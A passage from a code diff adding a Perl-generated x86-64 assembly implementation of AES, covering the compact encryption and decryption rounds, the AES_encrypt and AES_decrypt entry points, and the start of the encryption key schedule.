+	xor	$t5,$t2
+	shl	\$24,$acc0
+	xor	$acc2,$t3
+	shl	\$24,$acc1
+	xor	$acc0,$t0
+	shl	\$24,$s3
+	xor	$acc1,$t1
+	shl	\$24,$s2
+	mov	$t0,$s0
+	mov	$t1,$s1
+	xor	$t2,$s2
+	xor	$t3,$s3
+___
+}
+
+sub enctransform_ref()
+{ my $sn = shift;
+  my ($acc,$r2,$tmp)=("%r8d","%r9d","%r13d");
+
+$code.=<<___;
+	mov	$sn,$acc
+	and	\$0x80808080,$acc
+	mov	$acc,$tmp
+	shr	\$7,$tmp
+	lea	($sn,$sn),$r2
+	sub	$tmp,$acc
+	and	\$0xfefefefe,$r2
+	and	\$0x1b1b1b1b,$acc
+	mov	$sn,$tmp
+	xor	$acc,$r2
+
+	xor	$r2,$sn
+	rol	\$24,$sn
+	xor	$r2,$sn
+	ror	\$16,$tmp
+	xor	$tmp,$sn
+	ror	\$8,$tmp
+	xor	$tmp,$sn
+___
+}
+
+# unlike decrypt case it does not pay off to parallelize enctransform
+sub enctransform()
+{ my ($t3,$r20,$r21)=($acc2,"%r8d","%r9d");
+
+$code.=<<___;
+	mov	\$0x80808080,$t0
+	mov	\$0x80808080,$t1
+	and	$s0,$t0
+	and	$s1,$t1
+	mov	$t0,$acc0
+	mov	$t1,$acc1
+	shr	\$7,$t0
+	lea	($s0,$s0),$r20
+	shr	\$7,$t1
+	lea	($s1,$s1),$r21
+	sub	$t0,$acc0
+	sub	$t1,$acc1
+	and	\$0xfefefefe,$r20
+	and	\$0xfefefefe,$r21
+	and	\$0x1b1b1b1b,$acc0
+	and	\$0x1b1b1b1b,$acc1
+	mov	$s0,$t0
+	mov	$s1,$t1
+	xor	$acc0,$r20
+	xor	$acc1,$r21
+
+	xor	$r20,$s0
+	xor	$r21,$s1
+	 mov	\$0x80808080,$t2
+	rol	\$24,$s0
+	 mov	\$0x80808080,$t3
+	rol	\$24,$s1
+	 and	$s2,$t2
+	 and	$s3,$t3
+	xor	$r20,$s0
+	xor	$r21,$s1
+	 mov	$t2,$acc0
+	ror	\$16,$t0
+	 mov	$t3,$acc1
+	ror	\$16,$t1
+	 lea	($s2,$s2),$r20
+	 shr	\$7,$t2
+	xor	$t0,$s0
+	 shr	\$7,$t3
+	xor	$t1,$s1
+	ror	\$8,$t0
+	 lea	($s3,$s3),$r21
+	ror	\$8,$t1
+	 sub	$t2,$acc0
+	 sub	$t3,$acc1
+	xor	$t0,$s0
+	xor	$t1,$s1
+
+	and	\$0xfefefefe,$r20
+	and	\$0xfefefefe,$r21
+	and	\$0x1b1b1b1b,$acc0
+	and	\$0x1b1b1b1b,$acc1
+	mov	$s2,$t2
+	mov	$s3,$t3
+	xor	$acc0,$r20
+	xor	$acc1,$r21
+
+	ror	\$16,$t2
+	xor	$r20,$s2
+	ror	\$16,$t3
+	xor	$r21,$s3
+	rol	\$24,$s2
+	mov	0($sbox),$acc0			# prefetch Te4
+	rol	\$24,$s3
+	xor	$r20,$s2
+	mov	64($sbox),$acc1
+	xor	$r21,$s3
+	mov	128($sbox),$r20
+	xor	$t2,$s2
+	ror	\$8,$t2
+	xor	$t3,$s3
+	ror	\$8,$t3
+	xor	$t2,$s2
+	mov	192($sbox),$r21
+	xor	$t3,$s3
+___
+}
+
+$code.=<<___;
+.type	_x86_64_AES_encrypt_compact,\@abi-omnipotent
+.align	16
+_x86_64_AES_encrypt_compact:
+	lea	128($sbox),$inp			# size optimization
+	mov	0-128($inp),$acc1		# prefetch Te4
+	mov	32-128($inp),$acc2
+	mov	64-128($inp),$t0
+	mov	96-128($inp),$t1
+	mov	128-128($inp),$acc1
+	mov	160-128($inp),$acc2
+	mov	192-128($inp),$t0
+	mov	224-128($inp),$t1
+	jmp	.Lenc_loop_compact
+.align	16
+.Lenc_loop_compact:
+		xor	0($key),$s0		# xor with key
+		xor	4($key),$s1
+		xor	8($key),$s2
+		xor	12($key),$s3
+		lea	16($key),$key
+___
+		&enccompactvert();
+$code.=<<___;
+		cmp	16(%rsp),$key
+		je	.Lenc_compact_done
+___
+		&enctransform();
+$code.=<<___;
+	jmp	.Lenc_loop_compact
+.align	16
+.Lenc_compact_done:
+	xor	0($key),$s0
+	xor	4($key),$s1
+	xor	8($key),$s2
+	xor	12($key),$s3
+	.byte	0xf3,0xc3			# rep ret
+.size	_x86_64_AES_encrypt_compact,.-_x86_64_AES_encrypt_compact
+___
+
+# void AES_encrypt (const void *inp,void *out,const AES_KEY *key);
+$code.=<<___;
+.globl	AES_encrypt
+.type	AES_encrypt,\@function,3
+.align	16
+.globl	asm_AES_encrypt
+.hidden	asm_AES_encrypt
+asm_AES_encrypt:
+AES_encrypt:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	# allocate frame "above" key schedule
+	mov	%rsp,%r10
+	lea	-63(%rdx),%rcx	# %rdx is key argument
+	and	\$-64,%rsp
+	sub	%rsp,%rcx
+	neg	%rcx
+	and	\$0x3c0,%rcx
+	sub	%rcx,%rsp
+	sub	\$32,%rsp
+
+	mov	%rsi,16(%rsp)	# save out
+	mov	%r10,24(%rsp)	# save real stack pointer
+.Lenc_prologue:
+
+	mov	%rdx,$key
+	mov	240($key),$rnds	# load rounds
+
+	mov	0(%rdi),$s0	# load input vector
+	mov	4(%rdi),$s1
+	mov	8(%rdi),$s2
+	mov	12(%rdi),$s3
+
+	shl	\$4,$rnds
+	lea	($key,$rnds),%rbp
+	mov	$key,(%rsp)	# key schedule
+	mov	%rbp,8(%rsp)	# end of key schedule
+
+	# pick Te4 copy which can't "overlap" with stack frame or key schedule
+	lea	.LAES_Te+2048(%rip),$sbox
+	lea	768(%rsp),%rbp
+	sub	$sbox,%rbp
+	and	\$0x300,%rbp
+	lea	($sbox,%rbp),$sbox
+
+	call	_x86_64_AES_encrypt_compact
+
+	mov	16(%rsp),$out	# restore out
+	mov	24(%rsp),%rsi	# restore saved stack pointer
+	mov	$s0,0($out)	# write output vector
+	mov	$s1,4($out)
+	mov	$s2,8($out)
+	mov	$s3,12($out)
+
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lenc_epilogue:
+	ret
+.size	AES_encrypt,.-AES_encrypt
+___
+
+#------------------------------------------------------------------#
+
+sub decvert()
+{ my $t3="%r8d";	# zaps $inp!
+
+$code.=<<___;
+	# favor 3-way issue Opteron pipeline...
+	movzb	`&lo("$s0")`,$acc0
+	movzb	`&lo("$s1")`,$acc1
+	movzb	`&lo("$s2")`,$acc2
+	mov	0($sbox,$acc0,8),$t0
+	mov	0($sbox,$acc1,8),$t1
+	mov	0($sbox,$acc2,8),$t2
+
+	movzb	`&hi("$s3")`,$acc0
+	movzb	`&hi("$s0")`,$acc1
+	movzb	`&lo("$s3")`,$acc2
+	xor	3($sbox,$acc0,8),$t0
+	xor	3($sbox,$acc1,8),$t1
+	mov	0($sbox,$acc2,8),$t3
+
+	movzb	`&hi("$s1")`,$acc0
+	shr	\$16,$s0
+	movzb	`&hi("$s2")`,$acc2
+	xor	3($sbox,$acc0,8),$t2
+	shr	\$16,$s3
+	xor	3($sbox,$acc2,8),$t3
+
+	shr	\$16,$s1
+	lea	16($key),$key
+	shr	\$16,$s2
+
+	movzb	`&lo("$s2")`,$acc0
+	movzb	`&lo("$s3")`,$acc1
+	movzb	`&lo("$s0")`,$acc2
+	xor	2($sbox,$acc0,8),$t0
+	xor	2($sbox,$acc1,8),$t1
+	xor	2($sbox,$acc2,8),$t2
+
+	movzb	`&hi("$s1")`,$acc0
+	movzb	`&hi("$s2")`,$acc1
+	movzb	`&lo("$s1")`,$acc2
+	xor	1($sbox,$acc0,8),$t0
+	xor	1($sbox,$acc1,8),$t1
+	xor	2($sbox,$acc2,8),$t3
+
+	movzb	`&hi("$s3")`,$acc0
+	mov	12($key),$s3
+	movzb	`&hi("$s0")`,$acc2
+	xor	1($sbox,$acc0,8),$t2
+	mov	0($key),$s0
+	xor	1($sbox,$acc2,8),$t3
+
+	xor	$t0,$s0
+	mov	4($key),$s1
+	mov	8($key),$s2
+	xor	$t2,$s2
+	xor	$t1,$s1
+	xor	$t3,$s3
+___
+}
+
+sub declastvert()
+{ my $t3="%r8d";	# zaps $inp!
+
+$code.=<<___;
+	lea	2048($sbox),$sbox	# size optimization
+	movzb	`&lo("$s0")`,$acc0
+	movzb	`&lo("$s1")`,$acc1
+	movzb	`&lo("$s2")`,$acc2
+	movzb	($sbox,$acc0,1),$t0
+	movzb	($sbox,$acc1,1),$t1
+	movzb	($sbox,$acc2,1),$t2
+
+	movzb	`&lo("$s3")`,$acc0
+	movzb	`&hi("$s3")`,$acc1
+	movzb	`&hi("$s0")`,$acc2
+	movzb	($sbox,$acc0,1),$t3
+	movzb	($sbox,$acc1,1),$acc1	#$t0
+	movzb	($sbox,$acc2,1),$acc2	#$t1
+
+	shl	\$8,$acc1
+	shl	\$8,$acc2
+
+	xor	$acc1,$t0
+	xor	$acc2,$t1
+	shr	\$16,$s3
+
+	movzb	`&hi("$s1")`,$acc0
+	movzb	`&hi("$s2")`,$acc1
+	shr	\$16,$s0
+	movzb	($sbox,$acc0,1),$acc0	#$t2
+	movzb	($sbox,$acc1,1),$acc1	#$t3
+
+	shl	\$8,$acc0
+	shl	\$8,$acc1
+	shr	\$16,$s1
+	xor	$acc0,$t2
+	xor	$acc1,$t3
+	shr	\$16,$s2
+
+	movzb	`&lo("$s2")`,$acc0
+	movzb	`&lo("$s3")`,$acc1
+	movzb	`&lo("$s0")`,$acc2
+	movzb	($sbox,$acc0,1),$acc0	#$t0
+	movzb	($sbox,$acc1,1),$acc1	#$t1
+	movzb	($sbox,$acc2,1),$acc2	#$t2
+
+	shl	\$16,$acc0
+	shl	\$16,$acc1
+	shl	\$16,$acc2
+
+	xor	$acc0,$t0
+	xor	$acc1,$t1
+	xor	$acc2,$t2
+
+	movzb	`&lo("$s1")`,$acc0
+	movzb	`&hi("$s1")`,$acc1
+	movzb	`&hi("$s2")`,$acc2
+	movzb	($sbox,$acc0,1),$acc0	#$t3
+	movzb	($sbox,$acc1,1),$acc1	#$t0
+	movzb	($sbox,$acc2,1),$acc2	#$t1
+
+	shl	\$16,$acc0
+	shl	\$24,$acc1
+	shl	\$24,$acc2
+
+	xor	$acc0,$t3
+	xor	$acc1,$t0
+	xor	$acc2,$t1
+
+	movzb	`&hi("$s3")`,$acc0
+	movzb	`&hi("$s0")`,$acc1
+	mov	16+12($key),$s3
+	movzb	($sbox,$acc0,1),$acc0	#$t2
+	movzb	($sbox,$acc1,1),$acc1	#$t3
+	mov	16+0($key),$s0
+
+	shl	\$24,$acc0
+	shl	\$24,$acc1
+
+	xor	$acc0,$t2
+	xor	$acc1,$t3
+
+	mov	16+4($key),$s1
+	mov	16+8($key),$s2
+	lea	-2048($sbox),$sbox
+	xor	$t0,$s0
+	xor	$t1,$s1
+	xor	$t2,$s2
+	xor	$t3,$s3
+___
+}
+
+sub decstep()
+{ my ($i,@s) = @_;
+  my $tmp0=$acc0;
+  my $tmp1=$acc1;
+  my $tmp2=$acc2;
+  my $out=($t0,$t1,$t2,$s[0])[$i];
+
+	$code.="	mov	$s[0],$out\n"		if ($i!=3);
+			$tmp1=$s[2]			if ($i==3);
+	$code.="	mov	$s[2],$tmp1\n"		if ($i!=3);
+	$code.="	and	\$0xFF,$out\n";
+
+	$code.="	mov	0($sbox,$out,8),$out\n";
+	$code.="	shr	\$16,$tmp1\n";
+			$tmp2=$s[3]			if ($i==3);
+	$code.="	mov	$s[3],$tmp2\n"		if ($i!=3);
+
+			$tmp0=$s[1]			if ($i==3);
+	$code.="	movzb	".&hi($s[1]).",$tmp0\n";
+	$code.="	and	\$0xFF,$tmp1\n";
+	$code.="	shr	\$24,$tmp2\n";
+
+	$code.="	xor	3($sbox,$tmp0,8),$out\n";
+	$code.="	xor	2($sbox,$tmp1,8),$out\n";
+	$code.="	xor	1($sbox,$tmp2,8),$out\n";
+
+	$code.="	mov	$t2,$s[1]\n"		if ($i==3);
+	$code.="	mov	$t1,$s[2]\n"		if ($i==3);
+	$code.="	mov	$t0,$s[3]\n"		if ($i==3);
+	$code.="\n";
+}
+
+sub declast()
+{ my ($i,@s)=@_;
+  my $tmp0=$acc0;
+  my $tmp1=$acc1;
+  my $tmp2=$acc2;
+  my $out=($t0,$t1,$t2,$s[0])[$i];
+
+	$code.="	mov	$s[0],$out\n"		if ($i!=3);
+			$tmp1=$s[2]			if ($i==3);
+	$code.="	mov	$s[2],$tmp1\n"		if ($i!=3);
+	$code.="	and	\$0xFF,$out\n";
+
+	$code.="	movzb	2048($sbox,$out,1),$out\n";
+	$code.="	shr	\$16,$tmp1\n";
+			$tmp2=$s[3]			if ($i==3);
+	$code.="	mov	$s[3],$tmp2\n"		if ($i!=3);
+
+			$tmp0=$s[1]			if ($i==3);
+	$code.="	movzb	".&hi($s[1]).",$tmp0\n";
+	$code.="	and	\$0xFF,$tmp1\n";
+	$code.="	shr	\$24,$tmp2\n";
+
+	$code.="	movzb	2048($sbox,$tmp0,1),$tmp0\n";
+	$code.="	movzb	2048($sbox,$tmp1,1),$tmp1\n";
+	$code.="	movzb	2048($sbox,$tmp2,1),$tmp2\n";
+
+	$code.="	shl	\$8,$tmp0\n";
+	$code.="	shl	\$16,$tmp1\n";
+	$code.="	shl	\$24,$tmp2\n";
+
+	$code.="	xor	$tmp0,$out\n";
+	$code.="	mov	$t2,$s[1]\n"		if ($i==3);
+	$code.="	xor	$tmp1,$out\n";
+	$code.="	mov	$t1,$s[2]\n"		if ($i==3);
+	$code.="	xor	$tmp2,$out\n";
+	$code.="	mov	$t0,$s[3]\n"		if ($i==3);
+	$code.="\n";
+}
+
+$code.=<<___;
+.type	_x86_64_AES_decrypt,\@abi-omnipotent
+.align	16
+_x86_64_AES_decrypt:
+	xor	0($key),$s0			# xor with key
+	xor	4($key),$s1
+	xor	8($key),$s2
+	xor	12($key),$s3
+
+	mov	240($key),$rnds			# load key->rounds
+	sub	\$1,$rnds
+	jmp	.Ldec_loop
+.align	16
+.Ldec_loop:
+___
+	if ($verticalspin) { &decvert(); }
+	else {	&decstep(0,$s0,$s3,$s2,$s1);
+		&decstep(1,$s1,$s0,$s3,$s2);
+		&decstep(2,$s2,$s1,$s0,$s3);
+		&decstep(3,$s3,$s2,$s1,$s0);
+		$code.=<<___;
+		lea	16($key),$key
+		xor	0($key),$s0			# xor with key
+		xor	4($key),$s1
+		xor	8($key),$s2
+		xor	12($key),$s3
+___
+	}
+$code.=<<___;
+	sub	\$1,$rnds
+	jnz	.Ldec_loop
+___
+	if ($verticalspin) { &declastvert(); }
+	else {	&declast(0,$s0,$s3,$s2,$s1);
+		&declast(1,$s1,$s0,$s3,$s2);
+		&declast(2,$s2,$s1,$s0,$s3);
+		&declast(3,$s3,$s2,$s1,$s0);
+		$code.=<<___;
+		xor	16+0($key),$s0			# xor with key
+		xor	16+4($key),$s1
+		xor	16+8($key),$s2
+		xor	16+12($key),$s3
+___
+	}
+$code.=<<___;
+	.byte	0xf3,0xc3			# rep ret
+.size	_x86_64_AES_decrypt,.-_x86_64_AES_decrypt
+___
+
+sub deccompactvert()
+{ my ($t3,$t4,$t5)=("%r8d","%r9d","%r13d");
+
+$code.=<<___;
+	movzb	`&lo("$s0")`,$t0
+	movzb	`&lo("$s1")`,$t1
+	movzb	`&lo("$s2")`,$t2
+	movzb	`&lo("$s3")`,$t3
+	movzb	`&hi("$s3")`,$acc0
+	movzb	`&hi("$s0")`,$acc1
+	shr	\$16,$s3
+	movzb	`&hi("$s1")`,$acc2
+	movzb	($sbox,$t0,1),$t0
+	movzb	($sbox,$t1,1),$t1
+	movzb	($sbox,$t2,1),$t2
+	movzb	($sbox,$t3,1),$t3
+
+	movzb	($sbox,$acc0,1),$t4	#$t0
+	movzb	`&hi("$s2")`,$acc0
+	movzb	($sbox,$acc1,1),$t5	#$t1
+	movzb	($sbox,$acc2,1),$acc2	#$t2
+	movzb	($sbox,$acc0,1),$acc0	#$t3
+
+	shr	\$16,$s2
+	shl	\$8,$t5
+	shl	\$8,$t4
+	movzb	`&lo("$s2")`,$acc1
+	shr	\$16,$s0
+	xor	$t4,$t0
+	shr	\$16,$s1
+	movzb	`&lo("$s3")`,$t4
+
+	shl	\$8,$acc2
+	xor	$t5,$t1
+	shl	\$8,$acc0
+	movzb	`&lo("$s0")`,$t5
+	movzb	($sbox,$acc1,1),$acc1	#$t0
+	xor	$acc2,$t2
+	movzb	`&lo("$s1")`,$acc2
+
+	shl	\$16,$acc1
+	xor	$acc0,$t3
+	movzb	($sbox,$t4,1),$t4	#$t1
+	movzb	`&hi("$s1")`,$acc0
+	movzb	($sbox,$acc2,1),$acc2	#$t3
+	xor	$acc1,$t0
+	movzb	($sbox,$t5,1),$t5	#$t2
+	movzb	`&hi("$s2")`,$acc1
+
+	shl	\$16,$acc2
+	shl	\$16,$t4
+	shl	\$16,$t5
+	xor	$acc2,$t3
+	movzb	`&hi("$s3")`,$acc2
+	xor	$t4,$t1
+	shr	\$8,$s0
+	xor	$t5,$t2
+
+	movzb	($sbox,$acc0,1),$acc0	#$t0
+	movzb	($sbox,$acc1,1),$s1	#$t1
+	movzb	($sbox,$acc2,1),$s2	#$t2
+	movzb	($sbox,$s0,1),$s3	#$t3
+
+	mov	$t0,$s0
+	shl	\$24,$acc0
+	shl	\$24,$s1
+	shl	\$24,$s2
+	xor	$acc0,$s0
+	shl	\$24,$s3
+	xor	$t1,$s1
+	xor	$t2,$s2
+	xor	$t3,$s3
+___
+}
+
+# parallelized version! input is pair of 64-bit values: %rax=s1.s0
+# and %rcx=s3.s2, output is four 32-bit values in %eax=s0, %ebx=s1,
+# %ecx=s2 and %edx=s3.
+sub dectransform()
+{ my ($tp10,$tp20,$tp40,$tp80,$acc0)=("%rax","%r8", "%r9", "%r10","%rbx");
+  my ($tp18,$tp28,$tp48,$tp88,$acc8)=("%rcx","%r11","%r12","%r13","%rdx");
+  my $prefetch = shift;
+
+$code.=<<___;
+	mov	$mask80,$tp40
+	mov	$mask80,$tp48
+	and	$tp10,$tp40
+	and	$tp18,$tp48
+	mov	$tp40,$acc0
+	mov	$tp48,$acc8
+	shr	\$7,$tp40
+	lea	($tp10,$tp10),$tp20
+	shr	\$7,$tp48
+	lea	($tp18,$tp18),$tp28
+	sub	$tp40,$acc0
+	sub	$tp48,$acc8
+	and	$maskfe,$tp20
+	and	$maskfe,$tp28
+	and	$mask1b,$acc0
+	and	$mask1b,$acc8
+	xor	$acc0,$tp20
+	xor	$acc8,$tp28
+	mov	$mask80,$tp80
+	mov	$mask80,$tp88
+
+	and	$tp20,$tp80
+	and	$tp28,$tp88
+	mov	$tp80,$acc0
+	mov	$tp88,$acc8
+	shr	\$7,$tp80
+	lea	($tp20,$tp20),$tp40
+	shr	\$7,$tp88
+	lea	($tp28,$tp28),$tp48
+	sub	$tp80,$acc0
+	sub	$tp88,$acc8
+	and	$maskfe,$tp40
+	and	$maskfe,$tp48
+	and	$mask1b,$acc0
+	and	$mask1b,$acc8
+	xor	$acc0,$tp40
+	xor	$acc8,$tp48
+	mov	$mask80,$tp80
+	mov	$mask80,$tp88
+
+	and	$tp40,$tp80
+	and	$tp48,$tp88
+	mov	$tp80,$acc0
+	mov	$tp88,$acc8
+	shr	\$7,$tp80
+	 xor	$tp10,$tp20		# tp2^=tp1
+	shr	\$7,$tp88
+	 xor	$tp18,$tp28		# tp2^=tp1
+	sub	$tp80,$acc0
+	sub	$tp88,$acc8
+	lea	($tp40,$tp40),$tp80
+	lea	($tp48,$tp48),$tp88
+	 xor	$tp10,$tp40		# tp4^=tp1
+	 xor	$tp18,$tp48		# tp4^=tp1
+	and	$maskfe,$tp80
+	and	$maskfe,$tp88
+	and	$mask1b,$acc0
+	and	$mask1b,$acc8
+	xor	$acc0,$tp80
+	xor	$acc8,$tp88
+
+	xor	$tp80,$tp10		# tp1^=tp8
+	xor	$tp88,$tp18		# tp1^=tp8
+	xor	$tp80,$tp20		# tp2^tp1^=tp8
+	xor	$tp88,$tp28		# tp2^tp1^=tp8
+	mov	$tp10,$acc0
+	mov	$tp18,$acc8
+	xor	$tp80,$tp40		# tp4^tp1^=tp8
+	shr	\$32,$acc0
+	xor	$tp88,$tp48		# tp4^tp1^=tp8
+	shr	\$32,$acc8
+	xor	$tp20,$tp80		# tp8^=tp8^tp2^tp1=tp2^tp1
+	rol	\$8,`&LO("$tp10")`	# ROTATE(tp1^tp8,8)
+	xor	$tp28,$tp88		# tp8^=tp8^tp2^tp1=tp2^tp1
+	rol	\$8,`&LO("$tp18")`	# ROTATE(tp1^tp8,8)
+	xor	$tp40,$tp80		# tp2^tp1^=tp8^tp4^tp1=tp8^tp4^tp2
+	rol	\$8,`&LO("$acc0")`	# ROTATE(tp1^tp8,8)
+	xor	$tp48,$tp88		# tp2^tp1^=tp8^tp4^tp1=tp8^tp4^tp2
+
+	rol	\$8,`&LO("$acc8")`	# ROTATE(tp1^tp8,8)
+	xor	`&LO("$tp80")`,`&LO("$tp10")`
+	shr	\$32,$tp80
+	xor	`&LO("$tp88")`,`&LO("$tp18")`
+	shr	\$32,$tp88
+	xor	`&LO("$tp80")`,`&LO("$acc0")`
+	xor	`&LO("$tp88")`,`&LO("$acc8")`
+
+	mov	$tp20,$tp80
+	rol	\$24,`&LO("$tp20")`	# ROTATE(tp2^tp1^tp8,24)
+	mov	$tp28,$tp88
+	rol	\$24,`&LO("$tp28")`	# ROTATE(tp2^tp1^tp8,24)
+	shr	\$32,$tp80
+	xor	`&LO("$tp20")`,`&LO("$tp10")`
+	shr	\$32,$tp88
+	xor	`&LO("$tp28")`,`&LO("$tp18")`
+	rol	\$24,`&LO("$tp80")`	# ROTATE(tp2^tp1^tp8,24)
+	mov	$tp40,$tp20
+	rol	\$24,`&LO("$tp88")`	# ROTATE(tp2^tp1^tp8,24)
+	mov	$tp48,$tp28
+	shr	\$32,$tp20
+	xor	`&LO("$tp80")`,`&LO("$acc0")`
+	shr	\$32,$tp28
+	xor	`&LO("$tp88")`,`&LO("$acc8")`
+
+	`"mov	0($sbox),$mask80"	if ($prefetch)`
+	rol	\$16,`&LO("$tp40")`	# ROTATE(tp4^tp1^tp8,16)
+	`"mov	64($sbox),$maskfe"	if ($prefetch)`
+	rol	\$16,`&LO("$tp48")`	# ROTATE(tp4^tp1^tp8,16)
+	`"mov	128($sbox),$mask1b"	if ($prefetch)`
+	rol	\$16,`&LO("$tp20")`	# ROTATE(tp4^tp1^tp8,16)
+	`"mov	192($sbox),$tp80"	if ($prefetch)`
+	xor	`&LO("$tp40")`,`&LO("$tp10")`
+	rol	\$16,`&LO("$tp28")`	# ROTATE(tp4^tp1^tp8,16)
+	xor	`&LO("$tp48")`,`&LO("$tp18")`
+	`"mov	256($sbox),$tp88"	if ($prefetch)`
+	xor	`&LO("$tp20")`,`&LO("$acc0")`
+	xor	`&LO("$tp28")`,`&LO("$acc8")`
+___
+}
+
+$code.=<<___;
+.type	_x86_64_AES_decrypt_compact,\@abi-omnipotent
+.align	16
+_x86_64_AES_decrypt_compact:
+	lea	128($sbox),$inp			# size optimization
+	mov	0-128($inp),$acc1		# prefetch Td4
+	mov	32-128($inp),$acc2
+	mov	64-128($inp),$t0
+	mov	96-128($inp),$t1
+	mov	128-128($inp),$acc1
+	mov	160-128($inp),$acc2
+	mov	192-128($inp),$t0
+	mov	224-128($inp),$t1
+	jmp	.Ldec_loop_compact
+
+.align	16
+.Ldec_loop_compact:
+		xor	0($key),$s0		# xor with key
+		xor	4($key),$s1
+		xor	8($key),$s2
+		xor	12($key),$s3
+		lea	16($key),$key
+___
+		&deccompactvert();
+$code.=<<___;
+		cmp	16(%rsp),$key
+		je	.Ldec_compact_done
+
+		mov	256+0($sbox),$mask80
+		shl	\$32,%rbx
+		shl	\$32,%rdx
+		mov	256+8($sbox),$maskfe
+		or	%rbx,%rax
+		or	%rdx,%rcx
+		mov	256+16($sbox),$mask1b
+___
+		&dectransform(1);
+$code.=<<___;
+	jmp	.Ldec_loop_compact
+.align	16
+.Ldec_compact_done:
+	xor	0($key),$s0
+	xor	4($key),$s1
+	xor	8($key),$s2
+	xor	12($key),$s3
+	.byte	0xf3,0xc3			# rep ret
+.size	_x86_64_AES_decrypt_compact,.-_x86_64_AES_decrypt_compact
+___
+
+# void AES_decrypt (const void *inp,void *out,const AES_KEY *key);
+$code.=<<___;
+.globl	AES_decrypt
+.type	AES_decrypt,\@function,3
+.align	16
+.globl	asm_AES_decrypt
+.hidden	asm_AES_decrypt
+asm_AES_decrypt:
+AES_decrypt:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	# allocate frame "above" key schedule
+	mov	%rsp,%r10
+	lea	-63(%rdx),%rcx	# %rdx is key argument
+	and	\$-64,%rsp
+	sub	%rsp,%rcx
+	neg	%rcx
+	and	\$0x3c0,%rcx
+	sub	%rcx,%rsp
+	sub	\$32,%rsp
+
+	mov	%rsi,16(%rsp)	# save out
+	mov	%r10,24(%rsp)	# save real stack pointer
+.Ldec_prologue:
+
+	mov	%rdx,$key
+	mov	240($key),$rnds	# load rounds
+
+	mov	0(%rdi),$s0	# load input vector
+	mov	4(%rdi),$s1
+	mov	8(%rdi),$s2
+	mov	12(%rdi),$s3
+
+	shl	\$4,$rnds
+	lea	($key,$rnds),%rbp
+	mov	$key,(%rsp)	# key schedule
+	mov	%rbp,8(%rsp)	# end of key schedule
+
+	# pick Td4 copy which can't "overlap" with stack frame or key schedule
+	lea	.LAES_Td+2048(%rip),$sbox
+	lea	768(%rsp),%rbp
+	sub	$sbox,%rbp
+	and	\$0x300,%rbp
+	lea	($sbox,%rbp),$sbox
+	shr	\$3,%rbp	# recall "magic" constants!
+	add	%rbp,$sbox
+
+	call	_x86_64_AES_decrypt_compact
+
+	mov	16(%rsp),$out	# restore out
+	mov	24(%rsp),%rsi	# restore saved stack pointer
+	mov	$s0,0($out)	# write output vector
+	mov	$s1,4($out)
+	mov	$s2,8($out)
+	mov	$s3,12($out)
+
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Ldec_epilogue:
+	ret
+.size	AES_decrypt,.-AES_decrypt
+___
+#------------------------------------------------------------------#
+
+sub enckey()
+{
+$code.=<<___;
+	movz	%dl,%esi		# rk[i]>>0
+	movzb	-128(%rbp,%rsi),%ebx
+	movz	%dh,%esi		# rk[i]>>8
+	shl	\$24,%ebx
+	xor	%ebx,%eax
+
+	movzb	-128(%rbp,%rsi),%ebx
+	shr	\$16,%edx
+	movz	%dl,%esi		# rk[i]>>16
+	xor	%ebx,%eax
+
+	movzb	-128(%rbp,%rsi),%ebx
+	movz	%dh,%esi		# rk[i]>>24
+	shl	\$8,%ebx
+	xor	%ebx,%eax
+
+	movzb	-128(%rbp,%rsi),%ebx
+	shl	\$16,%ebx
+	xor	%ebx,%eax
+
+	xor	1024-128(%rbp,%rcx,4),%eax		# rcon
+___
+}
+
+# int private_AES_set_encrypt_key(const unsigned char *userKey, const int bits,
+#                        AES_KEY *key)
+$code.=<<___;
+.globl	private_AES_set_encrypt_key
+.type	private_AES_set_encrypt_key,\@function,3
+.align	16
+private_AES_set_encrypt_key:
+	push	%rbx
+	push	%rbp
+	push	%r12			# redundant, but allows to share 
+	push	%r13			# exception handler...
+	push	%r14
+	push	%r15
+	sub	\$8,%rsp
+.Lenc_key_prologue:
+
+	call	_x86_64_AES_set_encrypt_key
+
+	mov	40(%rsp),%rbp
+	mov	48(%rsp),%rbx
+	add	\$56,%rsp
+.Lenc_key_epilogue:
+	ret
+.size	private_AES_set_encrypt_key,.-private_AES_set_encrypt_key
+
+.type	_x86_64_AES_set_encrypt_key,\@abi-omnipotent
+.align	16
+_x86_64_AES_set_encrypt_key:
+	mov	%esi,%ecx			# %ecx=bits
+	mov	%rdi,%rsi			# %rsi=userKey
+	mov	%rdx,%rdi			# %rdi=key
+
+	test	\$-1,%rsi
+	jz	.Lbadpointer
+	test	\$-1,%rdi
+	jz	.Lbadpointer
+
+	lea	.LAES_Te(%rip),%rbp
+	lea	2048+128(%rbp),%rbp
+
+	# prefetch Te4
+	mov	0-128(%rbp),%eax
+	mov	32-128(%rbp),%ebx
+	mov	64-128(%rbp),%r8d
+	mov	96-128(%rbp),%edx
+	mov	128-128(%rbp),%eax
+	mov	160-128(%rbp),%ebx
+	mov	192-128(%rbp),%r8d
+	mov	224-128(%rbp),%edx
+
+	cmp	\$128,%ecx
+	je	.L10rounds
+	cmp	\$192,%ecx
+	je	.L12rounds
+	cmp	\$256,%ecx
+	je	.L14rounds
+	mov	\$-2,%rax			# invalid number of bits
+	jmp	.Lexit
+
+.L10rounds:
+	mov	0(%rsi),%rax			# copy first 4 dwords
+	mov	8(%rsi),%rdx
+	mov	%rax,0(%rdi)
+	mov	%rdx,8(%rdi)
+
+	shr	\$32,%rdx
+	xor	%ecx,%ecx
+	jmp	.L10shortcut
+.align	4
+.L10loop:
+		mov	0(%rdi),%eax			# rk[0]
+		mov	12(%rdi),%edx			# rk[3]
+.L10shortcut:
+___
+		&enckey	();
+$code.=<<___;
+		mov	%eax,16(%rdi)			# rk[4]
+		xor	4(%rdi),%eax
+		mov	%eax,20(%rdi)			# rk[5]
+		xor	8(%rdi),%eax
+		mov	%eax,24(%rdi)			# rk[6]
+		xor	12(%rdi),%eax
+		mov	%eax,28(%rdi)			# rk[7]
